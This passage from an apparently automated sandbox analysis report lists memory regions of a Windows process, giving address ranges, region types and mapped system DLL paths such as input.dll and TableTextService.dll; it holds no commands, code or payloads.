"\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37725 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = 
mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37726 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37727 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37728 start_va = 0x28c0000 end_va = 0x2914fff entry_point = 0x28c0000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 37729 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37730 start_va = 0x28c0000 end_va = 0x28defff entry_point = 0x28c0000 region_type = mapped_file name = "sptip.dll" filename = "\\Windows\\IME\\SPTIP.DLL" (normalized: "c:\\windows\\ime\\sptip.dll") Region: id = 37731 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37732 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37733 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = 
mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37734 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37735 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37736 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37737 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37738 start_va = 0x28c0000 end_va = 0x2914fff entry_point = 0x28c0000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 37739 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37740 start_va = 0x29c0000 end_va = 
0x2a7ffff entry_point = 0x29c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 37741 start_va = 0x2870000 end_va = 0x2871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002870000" filename = "" Region: id = 37742 start_va = 0x2880000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 37743 start_va = 0x2a90000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 37744 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37745 start_va = 0x28c0000 end_va = 0x28c0fff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 37746 start_va = 0x28d0000 end_va = 0x28d0fff entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 37747 start_va = 0x28e0000 end_va = 0x28e0fff entry_point = 0x28e0000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 37748 start_va = 0x74360000 end_va = 0x7439bfff entry_point = 0x74360000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 37749 start_va = 0x28f0000 end_va = 0x28f0fff entry_point = 0x28f0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 37750 start_va = 0x742d0000 end_va = 0x7435bfff entry_point = 0x742d0000 region_type = mapped_file name = "uiautomationcore.dll" filename = 
"\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 37751 start_va = 0x76260000 end_va = 0x76264fff entry_point = 0x76260000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 37763 start_va = 0x75bb0000 end_va = 0x75c0efff entry_point = 0x75bb0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 37764 start_va = 0x2900000 end_va = 0x2900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37765 start_va = 0x2900000 end_va = 0x2900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37766 start_va = 0x2900000 end_va = 0x2900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37809 start_va = 0x2900000 end_va = 0x2901fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37810 start_va = 0x2900000 end_va = 0x2901fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37824 start_va = 0x75d60000 end_va = 0x75d8cfff entry_point = 0x75d60000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 37825 start_va = 0x2ad0000 end_va = 0x2b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 37826 start_va = 0x37e0000 end_va = 0x410ffff entry_point = 0x37e0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 38232 start_va = 0x2900000 end_va = 
0x2905fff entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 38233 start_va = 0x2910000 end_va = 0x2910fff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 38234 start_va = 0x2960000 end_va = 0x2967fff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 38235 start_va = 0x2ba0000 end_va = 0x2c7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ba0000" filename = "" Region: id = 38236 start_va = 0x2ba0000 end_va = 0x2c7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ba0000" filename = "" Region: id = 38237 start_va = 0x2a80000 end_va = 0x2a80fff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 38238 start_va = 0x2ad0000 end_va = 0x2ad0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 38239 start_va = 0x2ae0000 end_va = 0x2ae0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 38240 start_va = 0x2af0000 end_va = 0x2af0fff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 38241 start_va = 0x2b00000 end_va = 0x2b00fff entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 38242 start_va = 0x2b10000 end_va = 0x2b10fff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 38243 start_va = 0x2b20000 end_va = 0x2b20fff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 38244 start_va = 0x2b30000 end_va = 0x2b30fff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 38245 start_va = 0x2b40000 end_va = 0x2b40fff entry_point = 0x0 region_type = 
private name = "private_0x0000000002b40000" filename = "" Region: id = 38246 start_va = 0x2b50000 end_va = 0x2b50fff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 38247 start_va = 0x2b60000 end_va = 0x2b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 38248 start_va = 0x2c80000 end_va = 0x2c80fff entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 38249 start_va = 0x2c90000 end_va = 0x2c90fff entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 38250 start_va = 0x2ca0000 end_va = 0x2ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 38251 start_va = 0x2cb0000 end_va = 0x2cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 38252 start_va = 0x2cc0000 end_va = 0x2cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 38253 start_va = 0x2cd0000 end_va = 0x2cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 38254 start_va = 0x2ce0000 end_va = 0x2ce0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 38255 start_va = 0x2cf0000 end_va = 0x2cf0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 38256 start_va = 0x2d00000 end_va = 0x2d00fff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 38257 start_va = 0x2d10000 end_va = 0x2d10fff entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 38258 start_va = 0x2d20000 end_va = 0x2d20fff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" 
Region: id = 38259 start_va = 0x2d30000 end_va = 0x2d30fff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 38260 start_va = 0x2d40000 end_va = 0x2d40fff entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 38261 start_va = 0x2d50000 end_va = 0x2d50fff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 38262 start_va = 0x2d60000 end_va = 0x2d60fff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 38263 start_va = 0x2d70000 end_va = 0x2d70fff entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 38264 start_va = 0x2d80000 end_va = 0x2d80fff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 38265 start_va = 0x2d90000 end_va = 0x2d90fff entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 38266 start_va = 0x2da0000 end_va = 0x2da0fff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 38267 start_va = 0x2db0000 end_va = 0x2db0fff entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 38268 start_va = 0x2dc0000 end_va = 0x2dc0fff entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 38269 start_va = 0x2dd0000 end_va = 0x2dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 38270 start_va = 0x2de0000 end_va = 0x2de0fff entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 38271 start_va = 0x2df0000 end_va = 0x2df0fff entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 38272 start_va = 0x2e00000 end_va = 0x2e00fff 
entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 38273 start_va = 0x2e10000 end_va = 0x2e10fff entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 38274 start_va = 0x2e20000 end_va = 0x2e26fff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 38275 start_va = 0x2e30000 end_va = 0x2e39fff entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 38276 start_va = 0x2e40000 end_va = 0x2e46fff entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 38277 start_va = 0x2e50000 end_va = 0x2e73fff entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 38278 start_va = 0x2e80000 end_va = 0x2e89fff entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 38279 start_va = 0x2e90000 end_va = 0x2e96fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 38280 start_va = 0x2ea0000 end_va = 0x2ea9fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 38281 start_va = 0x2eb0000 end_va = 0x2eb6fff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 38282 start_va = 0x2ec0000 end_va = 0x2ef7fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 38283 start_va = 0x2f00000 end_va = 0x2f09fff entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 38284 start_va = 0x2f10000 end_va = 0x2f10fff entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 38285 start_va = 0x2f20000 end_va = 0x2f20fff entry_point = 0x0 region_type = private name = 
"private_0x0000000002f20000" filename = "" Region: id = 38286 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 38287 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 38288 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 38289 start_va = 0x2f60000 end_va = 0x2f61fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 38290 start_va = 0x2f70000 end_va = 0x2f70fff entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 38291 start_va = 0x2f80000 end_va = 0x2f81fff entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 38292 start_va = 0x2f90000 end_va = 0x2f90fff entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 38293 start_va = 0x2fa0000 end_va = 0x2fa1fff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 38294 start_va = 0x2fb0000 end_va = 0x2fb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 38295 start_va = 0x2fc0000 end_va = 0x2fc1fff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 38296 start_va = 0x2fd0000 end_va = 0x2fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 38297 start_va = 0x2fe0000 end_va = 0x2fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 38298 start_va = 0x2ff0000 end_va = 0x2ff0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 38299 
start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 38300 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 38301 start_va = 0x3020000 end_va = 0x3020fff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 38302 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 38303 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 38304 start_va = 0x3050000 end_va = 0x3050fff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 38305 start_va = 0x3060000 end_va = 0x3060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 38306 start_va = 0x3070000 end_va = 0x3070fff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 38307 start_va = 0x3080000 end_va = 0x3080fff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 38308 start_va = 0x3090000 end_va = 0x3090fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 38309 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 38310 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 38311 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 38312 start_va = 0x30d0000 end_va = 0x30d0fff entry_point = 0x0 
region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 38313 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 38314 start_va = 0x30f0000 end_va = 0x3180fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 38315 start_va = 0x3080000 end_va = 0x3080fff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 38316 start_va = 0x3090000 end_va = 0x3090fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 38317 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 38318 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 38319 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 38320 start_va = 0x30d0000 end_va = 0x30d0fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 38321 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 38322 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 38323 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 38324 start_va = 0x3110000 end_va = 0x3110fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 38325 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" 
filename = "" Region: id = 38326 start_va = 0x3130000 end_va = 0x3130fff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 38327 start_va = 0x3140000 end_va = 0x3140fff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 38328 start_va = 0x3150000 end_va = 0x3150fff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 38329 start_va = 0x3160000 end_va = 0x3160fff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 38330 start_va = 0x3170000 end_va = 0x3170fff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 38331 start_va = 0x3180000 end_va = 0x3180fff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 38332 start_va = 0x3190000 end_va = 0x3190fff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 38333 start_va = 0x31a0000 end_va = 0x31a0fff entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 38334 start_va = 0x31b0000 end_va = 0x31b0fff entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 38335 start_va = 0x31c0000 end_va = 0x31c0fff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 38336 start_va = 0x4110000 end_va = 0x4110fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 38337 start_va = 0x4120000 end_va = 0x4120fff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 38338 start_va = 0x4130000 end_va = 0x4130fff entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 38339 start_va = 0x4140000 end_va = 
0x4140fff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 38340 start_va = 0x4150000 end_va = 0x4150fff entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 38341 start_va = 0x4160000 end_va = 0x4160fff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 38342 start_va = 0x4170000 end_va = 0x4170fff entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 38343 start_va = 0x4180000 end_va = 0x4180fff entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 38344 start_va = 0x4190000 end_va = 0x4190fff entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 38345 start_va = 0x41a0000 end_va = 0x41a0fff entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 38346 start_va = 0x41b0000 end_va = 0x41b0fff entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 38347 start_va = 0x41c0000 end_va = 0x41c0fff entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 38348 start_va = 0x41d0000 end_va = 0x41d0fff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 38349 start_va = 0x41e0000 end_va = 0x41e0fff entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 38350 start_va = 0x41f0000 end_va = 0x41f0fff entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 38351 start_va = 0x4200000 end_va = 0x4206fff entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 38352 start_va = 0x4210000 end_va = 0x4219fff entry_point = 0x0 region_type = private name = 
"private_0x0000000004210000" filename = "" Region: id = 38353 start_va = 0x4220000 end_va = 0x4226fff entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 38354 start_va = 0x4230000 end_va = 0x4253fff entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 38355 start_va = 0x4260000 end_va = 0x4269fff entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 38356 start_va = 0x4270000 end_va = 0x4276fff entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 38357 start_va = 0x4280000 end_va = 0x4289fff entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 38358 start_va = 0x4290000 end_va = 0x4296fff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 38359 start_va = 0x42a0000 end_va = 0x42d7fff entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 38360 start_va = 0x42e0000 end_va = 0x42e9fff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 38361 start_va = 0x42f0000 end_va = 0x42f0fff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 38362 start_va = 0x4300000 end_va = 0x4300fff entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 38363 start_va = 0x4310000 end_va = 0x4310fff entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 38364 start_va = 0x4320000 end_va = 0x4320fff entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 38365 start_va = 0x4330000 end_va = 0x4330fff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 38366 
start_va = 0x4340000 end_va = 0x4341fff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 38367 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 38368 start_va = 0x4360000 end_va = 0x4361fff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 38369 start_va = 0x4370000 end_va = 0x4370fff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 38370 start_va = 0x4380000 end_va = 0x4381fff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 38371 start_va = 0x4390000 end_va = 0x4390fff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 38372 start_va = 0x43a0000 end_va = 0x43a1fff entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 38373 start_va = 0x43b0000 end_va = 0x43b0fff entry_point = 0x0 region_type = private name = "private_0x00000000043b0000" filename = "" Region: id = 38374 start_va = 0x43c0000 end_va = 0x43c0fff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 38375 start_va = 0x43d0000 end_va = 0x43d0fff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 38376 start_va = 0x43e0000 end_va = 0x43e0fff entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 38377 start_va = 0x43f0000 end_va = 0x43f0fff entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 38378 start_va = 0x4400000 end_va = 0x4400fff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 38379 start_va = 0x4410000 end_va = 0x4410fff entry_point = 0x0 
region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 38380 start_va = 0x4420000 end_va = 0x4420fff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 38381 start_va = 0x4430000 end_va = 0x4430fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 38382 start_va = 0x4440000 end_va = 0x4440fff entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 38383 start_va = 0x4450000 end_va = 0x4450fff entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 38384 start_va = 0x4460000 end_va = 0x4460fff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 38385 start_va = 0x4470000 end_va = 0x4470fff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 38386 start_va = 0x4480000 end_va = 0x4480fff entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 38387 start_va = 0x4490000 end_va = 0x4490fff entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 38388 start_va = 0x44a0000 end_va = 0x44a0fff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 38389 start_va = 0x44b0000 end_va = 0x44b0fff entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 38390 start_va = 0x44c0000 end_va = 0x44c0fff entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 38391 start_va = 0x44d0000 end_va = 0x4560fff entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 38406 start_va = 0x2970000 end_va = 0x2970fff entry_point = 0x0 region_type = private name = "private_0x0000000002970000" 
